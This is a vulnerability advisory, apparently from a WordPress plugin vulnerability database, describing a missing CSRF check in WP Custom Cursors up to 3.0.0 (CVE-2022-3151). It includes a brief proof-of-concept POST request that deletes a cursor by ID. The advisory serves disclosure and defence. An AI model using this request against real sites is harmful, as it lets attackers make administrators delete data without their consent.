WP Custom Cursors by Web_Trendy

WP Custom Cursors by Web_Trendy <= 3.0.0 - Arbitrary Cursor Deletion via CSRF

LANACOMMONVDB ID: 96ff97f1-de1e-423d-a36d-15e2bb9d5c27

The plugin does not have Cross-Site Request Forgery (CSRF) check in place when deleting cursors, which could allow attackers to made a logged in admin delete arbitrary cursors via a Cross-Site Request Forgery (CSRF) attack.

Proof of Concept

POST /wp-admin/admin.php?page=wp_custom_cursors HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

submit&delete_row=1

This will make them delete the cursor with ID 1.

References

Source Code: https://wordpress.org/plugins/wp-custom-cursors/

CVE: CVE-2022-3151

Attributes

Catgory: WordPress Plugin

Discovered: 2022-09-07

Published: 2022-09-21

Affected Version: <= 3.0.0

Classification

Type: Cross-Site Request Forgery (CSRF)

Researcher

Name: István Márton

Email: [email protected]